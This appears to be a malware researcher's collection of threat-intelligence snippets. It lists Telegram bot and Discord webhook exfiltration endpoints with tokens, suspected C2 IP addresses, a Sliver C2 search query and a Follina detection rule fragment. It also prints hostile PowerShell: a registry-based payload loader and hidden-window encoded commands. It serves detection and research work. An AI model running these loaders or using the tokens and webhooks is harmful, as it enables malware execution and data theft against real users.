embee-research

https://api[.]telegram[.]org/bot6027094622:AAEZaK53bi-mjYC-JB2HDLU-zgFQIRMlkDE/
https://discord[.]com/api/webhooks/1150363626331451392/diQm3_-LAtuDqv52znxS979lWgZku3L6w_1YxVEt-0J336JdLcEM-R02NLCvYjDtnmBt
https://api[.]telegram[.]org/bot6611314758:AAGHJIA8l39bb6nc4czEcEnmTwdPEefvIpw/
https://api[.]telegram[.]org/bot6317317454:AAFQQFrf5JUZqsq156w8lOSJCUWwXYCjhaM/
https://discord[.]com/api/webhooks/1145970037304344606/AsEAtLwNVLMbys2JAZ1QNXr3OHTVxdqwdcF7w2Iz9TI8GEd8Wwj1jO58clSxqcG4u1g_
https://discord[.]com/api/webhooks/1133291620918382632/dqE_masvBaWgRzB59nggrkJBKoBvmOr6eW_j0AXdmxr8iUJKxaehQyz1TL6QQaDldmii
https://api[.]telegram[.]org/bot6345758726:AAHPSwN6mqm3uVDSbe-WsPGGFfg9MdQ5s-I/
https://api[.]telegram[.]org/bot6150575626:AAHpE9c3ETZP17P9GlpcOiMFC26P5vpRWxM/
https://discordapp[.]com/api/webhooks/1151736280481275954/-cWVVtMV6DDO5Frngy8Hw6Yg-3vUt8Aim3cgeGjoFBtezbpylfwU8mkPNZLGWzsIkYXJ
https://api[.]telegram[.]org/bot6408943220:AAG8hou2uFE7KkcOsrHNbNgPiCdaTTMvrX8/

embee-research

2.224.144.191
5.224.222.214
5.249.165.85
15.165.236.45
15.204.170.1
20.67.243.141
20.169.37.196
23.254.130.126
23.254.227.121
23.254.231.83

embee-research

195.58.52.46
198.244.135.226
198.244.135.232
207.148.92.178
124.222.121.166
129.159.135.74
134.122.133.131
134.122.133.133
134.122.133.135
138.197.36.34

embee-research

#Sliver C2's
#services:(tls.certificates.leaf_data.subject.common_name:multiplayer and tls.certificates.leaf_data.issuer.common_name:operators)

3.8.115.155
3.19.223.137
3.70.227.81
3.92.41.116
3.235.153.136
4.240.86.147
5.188.34.63

embee-research

102.116.6.203:8009
108.160.136.232:8088
111.90.148.240:8088
116.36.143.105:8888
139.180.219.18:8088
14.225.204.247:6060
14.225.254.32:9090
144.168.46.50:9000
146.70.113.150:8443

embee-research

2.133.130.23
27.11.235.246
42.192.132.19
43.240.48.46
43.244.89.152
45.32.106.94
49.12.46.139
59.26.93.6
80.168.201.195
81.19.141.35

embee-research

title: Suspicious msdt.exe execution - Office Exploit
id: 97a80ed7-1f3f-4d05-9ef4-65760e634f6b
status: experimental
description: This rule will monitor suspicious arguments passed to the msdt.exe process. These arguments are an indicator of recent Office/Msdt exploitation. 
references:
    - https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e
    - https://twitter.com/MalwareJake/status/1531019243411623939
author: 'Matthew Brennan'
tags:
    - attack.execution

embee-research

<# hljnagvaw #>$u=$env:UserName;
for ($counter=0; $counter -le 700; $counter++){
    $pathToRegKey="HKCU:\SOFTWARE\"+$u+"1";
    Try{
        $a=$a+(Get-ItemProperty -path $pathToRegKey).$counter
    } 
    Catch{}
};

function StringToBytes{[cmdletbinding()]

embee-research

"\"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe\"    -Win Hi  -En \"PAAjACAAaABsAGoAbgBhAGcAdgBhAHcAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAA3ADAAMAA7ACQAaQArACsAKQB7ACQAYwA9ACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAIgArACQAdQArACIAMQAiADsAVAByAHkAewAkAGEAPQAkAGEAKwAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAGMAKQAuACQAaQB9AEMAYQB0AGMAaAB7AH0AfQA7AGYAdQBuAGMAdABpAG8AbgAgAGMAaABiAGEAewBbAGMAbQBkAGwAZQB0AGIAaQBuAGQAaQBuAGcAKAApAF0AcABhAHIAYQBtACgAWwBwAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACkAXQBbAFMAdAByAGkAbgBnAF0AJABoAHMAKQA7ACQAQgB5AHQAZQBzACAAPQAgAFsAYgB5AHQAZQBbAF0AXQA6ADoAbgBlAHcAKAAkAGgAcwAuAEwAZQBuAGcAdABoACAALwAgADIAKQA7AGYAbwByACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGgAcwAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwA9ADIAKQB7ACQAQgB5AHQAZQBzAFsAJABpAC8AMgBdACAAPQAgAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgB5AHQAZQAoACQAaABzAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADIAKQAsACAAMQA2ACkAfQAkAEIAeQ

embee-research

Powershell -win hi -Command "
  $r = [Environment]::GetEnvironmentVariable("user.name", 'User').split();
  $p=$r[0];
  $r[0]=";
  Start-Process $p -AgumentList ($r - join '') -Win Hi
"